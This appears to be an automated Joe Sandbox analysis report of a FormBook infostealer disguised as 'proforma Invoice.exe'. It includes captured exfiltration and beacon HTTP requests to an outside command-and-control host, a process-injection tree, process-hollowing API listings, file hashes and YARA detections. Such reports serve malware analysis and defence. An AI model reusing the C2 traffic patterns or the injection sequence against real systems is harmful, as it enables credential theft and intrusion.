                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>


                                                                        Session ID: 38
                                                                        Source IP: 192.168.2.5
                                                                        Source Port: 50018
                                                                        Destination IP: 195.110.124.133
                                                                        Destination Port: 80
                                                                        PID: 2276
                                                                        Process: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe

                                                                        Timestamp: Nov 7, 2024 10:12:50.664100885 CET
                                                                        Bytes transferred: 644
                                                                        Direction: OUT
                                                                        Data:
                                                                        POST /xtuc/ HTTP/1.1
                                                                        Host: www.nutrigenfit.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.nutrigenfit.online
                                                                        Referer: http://www.nutrigenfit.online/xtuc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=qnTAPNuVSRwUTpf2mFEm4yOEY+q5/kM39mOSEIWCeywtCiFnUqZBmBvLC8nAuXms8edE1Z3PaPssNooCf8aIF3YFLJvTgq4CYn40Emi+Y8/NAgpN6a3JIqaHwXMhdEpFoiI4jEqjfjgFAnIbfbkSnfjYGKLsakYzSjzw36yNnqDorn4BFuipbeWpWDG/JPniuuWPHQDiRJYt/MLFWsMf2uClF22l

                                                                        Timestamp: Nov 7, 2024 10:12:51.495136976 CET
                                                                        Bytes transferred: 367
                                                                        Direction: IN
                                                                        Data:
                                                                        HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:51 GMT
                                                                        Server: Apache
                                                                        Content-Length: 203
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>


                                                                        Session ID: 39
                                                                        Source IP: 192.168.2.5
                                                                        Source Port: 50019
                                                                        Destination IP: 195.110.124.133
                                                                        Destination Port: 80
                                                                        PID: 2276
                                                                        Process: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe

                                                                        Timestamp: Nov 7, 2024 10:12:53.210819006 CET
                                                                        Bytes transferred: 1661
                                                                        Direction: OUT
                                                                        Data:
                                                                        POST /xtuc/ HTTP/1.1
                                                                        Host: www.nutrigenfit.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.nutrigenfit.online
                                                                        Referer: http://www.nutrigenfit.online/xtuc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W= [TRUNCATED]

                                                                        Timestamp: Nov 7, 2024 10:12:54.052321911 CET
                                                                        Bytes transferred: 367
                                                                        Direction: IN
                                                                        Data:
                                                                        HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:53 GMT
                                                                        Server: Apache
                                                                        Content-Length: 203
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>


                                                                        Session ID: 40
                                                                        Source IP: 192.168.2.5
                                                                        Source Port: 50020
                                                                        Destination IP: 195.110.124.133
                                                                        Destination Port: 80
                                                                        PID: 2276
                                                                        Process: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe

                                                                        Timestamp: Nov 7, 2024 10:12:55.756026030 CET
                                                                        Bytes transferred: 361
                                                                        Direction: OUT
                                                                        Data:
                                                                        GET /xtuc/?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=nl7gM5aMdEMYbb3ptVYmv1b7ec2+/kw+vnGGIIbLXQ8RGikaSqRdhk/1NtXc33OFwO5l66LjcfQUL5smZ/PpUkgPTPCZ371zTnVFYiKZa83XWAN88d/vEa+bzXIHSkQ2pw== HTTP/1.1
                                                                        Host: www.nutrigenfit.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0

                                                                        Timestamp: Nov 7, 2024 10:12:56.585658073 CET
                                                                        Bytes transferred: 367
                                                                        Direction: IN
                                                                        Data:
                                                                        HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:56 GMT
                                                                        Server: Apache
                                                                        Content-Length: 203
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>



                                                                        Target ID:0
                                                                        Start time:04:08:54
                                                                        Start date:07/11/2024
                                                                        Path:C:\Users\user\Desktop\proforma Invoice.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\proforma Invoice.exe"
                                                                        Imagebase:0x9e0000
                                                                        File size:972'288 bytes
                                                                        MD5 hash:3757282CE10C90DF6D5E364E22975534
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:04:08:55
                                                                        Start date:07/11/2024
                                                                        Path:C:\Users\user\Desktop\proforma Invoice.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\proforma Invoice.exe"
                                                                        Imagebase:0x5f0000
                                                                        File size:972'288 bytes
                                                                        MD5 hash:3757282CE10C90DF6D5E364E22975534
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2476745672.0000000002030000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:04:09:29
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe"
                                                                        Imagebase:0x520000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4498872401.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:6
                                                                        Start time:04:09:32
                                                                        Start date:07/11/2024
                                                                        Path:C:\Windows\SysWOW64\EhStorAuthn.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\EhStorAuthn.exe"
                                                                        Imagebase:0x9e0000
                                                                        File size:119'808 bytes
                                                                        MD5 hash:0C9245FDD67B14B9E7FBEBB88C3A5E7F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:8
                                                                        Start time:04:09:45
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe"
                                                                        Imagebase:0x520000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:9
                                                                        Start time:04:09:57
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff79f9e0000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true


                                                                          Execution Graph

                                                                          Execution Coverage:10.7%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:202
                                                                          Total number of Limit Nodes:11
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 92b1c801e2cb8390e6a6cda9b98274c7675c8e26f29f8b0436242788c078683b
                                                                          • Instruction ID: a72b8e4d8fd80cfa5a0063cdd7a94cf2e706b117b85982ba1e0e405c473c95cb
                                                                          • Opcode Fuzzy Hash: 92b1c801e2cb8390e6a6cda9b98274c7675c8e26f29f8b0436242788c078683b
                                                                          • Instruction Fuzzy Hash: BBC1AEB17007018FDB19DB76C450BAEB7FAAF89605F28487ED146CB2A0DB35E806C751
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 63f94e34f8281afa9e971aed137fc03ead9019bc5d8b3f947e4ce7ea7f00f574
                                                                          • Instruction ID: 81915bb00b5be01d9e2053ea0a587cb9056cf5091f60f392c92ae3cf18ea9aff
                                                                          • Opcode Fuzzy Hash: 63f94e34f8281afa9e971aed137fc03ead9019bc5d8b3f947e4ce7ea7f00f574
                                                                          • Instruction Fuzzy Hash: 374292B8E11219CFDB54CF69D984B9DBBF2BF48310F5481A9E809A7355D730AA81CF60
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c62ed2db77c917addf0df37c091ebb6f5c64911024ae89855e3d585a42bda02f
                                                                          • Instruction ID: 9ca55eace432c7ae8609926a0d2b927c223cab813e46a17afb7b55928d8cc91e
                                                                          • Opcode Fuzzy Hash: c62ed2db77c917addf0df37c091ebb6f5c64911024ae89855e3d585a42bda02f
                                                                          • Instruction Fuzzy Hash: 5A71D874E01219CFDB18CF6AD884B9DBBF2BF88310F1481A9D809A7355D731A941CF60
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2e0ff7ac73ebb6f4eb0378ee481bf004c5e25c36a06e7ed8418cc972fe4f4476
                                                                          • Instruction ID: ab1a0fa59d4987c673ea6497cb17f5a14e88b98face905a2a9cc748e1674d8d1
                                                                          • Opcode Fuzzy Hash: 2e0ff7ac73ebb6f4eb0378ee481bf004c5e25c36a06e7ed8418cc972fe4f4476
                                                                          • Instruction Fuzzy Hash: 4C517FB5E016199FDF08DFEAC8446EEFBB2FF89310F10802AE419AB254DB345946CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f68e4b4adf4b2da9192f55a1682ac80c0c330f0eeb73c6bf2e6f3645ad044bb4
                                                                          • Instruction ID: 9ee1271b3a619ce0c160f767104780f87b247daa9f01fcf71e812e30aa5deac1
                                                                          • Opcode Fuzzy Hash: f68e4b4adf4b2da9192f55a1682ac80c0c330f0eeb73c6bf2e6f3645ad044bb4
                                                                          • Instruction Fuzzy Hash: C34190B5E006199FDB08CFEAC9456AEFBF2BF88310F14C16AD419AB254DB345946CF40

                                                                          Control-flow Graph (first block at 147d0b0)
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0147D13E
                                                                          • GetCurrentThread.KERNEL32 ref: 0147D17B
                                                                          • GetCurrentProcess.KERNEL32 ref: 0147D1B8
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0147D211
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread

                                                                          Control-flow Graph (first block at 147d0c0)
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0147D13E
                                                                          • GetCurrentThread.KERNEL32 ref: 0147D17B
                                                                          • GetCurrentProcess.KERNEL32 ref: 0147D1B8
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0147D211
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread

                                                                          Control-flow Graph (first block at 7d9c885)
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D9CAC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Similarity
                                                                          • API ID: CreateProcess

                                                                          Control-flow Graph (first block at 7d9c890)
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D9CAC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Similarity
                                                                          • API ID: CreateProcess

                                                                          Control-flow Graph (first block at 147ae28)
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0147B07E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Similarity
                                                                          • API ID: HandleModule

                                                                          Control-flow Graph (first block at 147590c)
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 014759C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Create
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 014759C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Create
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D9C260
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D9C260
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0147D797
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D9C0B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D9C340
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D9C340
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D9C0B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0147D797
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D9C17E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D9C17E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0147B07E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D9EB75
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D9EB75
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051527999.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_109d000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051565278.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10ad000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051565278.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10ad000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 908b9da3ec14122ae99c2b06fd6b07fb891351d56636ccb8f6d3f5bdf70d4ea3
                                                                          • Instruction ID: 1bb80e9297bf25fe66fb474991a29e35eeb6608e98be4c861f8ca6052053c94b
                                                                          • Opcode Fuzzy Hash: 908b9da3ec14122ae99c2b06fd6b07fb891351d56636ccb8f6d3f5bdf70d4ea3
                                                                          • Instruction Fuzzy Hash: 32210771504204EFDB05DFD8D5C0F2ABBA5FB94324F60C5ADD9894B656C33AD406CB61
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051565278.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10ad000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 862f1702802b1c78ca59f15d9a61cce81d11a44b8186675e5d40f3fa5de7590f
                                                                          • Instruction ID: 400cc396603d0699e34582b23b8d1c32fc73202846720b3619a53ace9360e19f
                                                                          • Opcode Fuzzy Hash: 862f1702802b1c78ca59f15d9a61cce81d11a44b8186675e5d40f3fa5de7590f
                                                                          • Instruction Fuzzy Hash: B12183755483809FCB03CF64D994B11BFB1EB46214F28C5DAD8898F6A7C33A9816CB62
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051527999.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_109d000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                          • Instruction ID: 42c48482266092b74f45e4180b1023e32b380d65390c233c71c18363084413cb
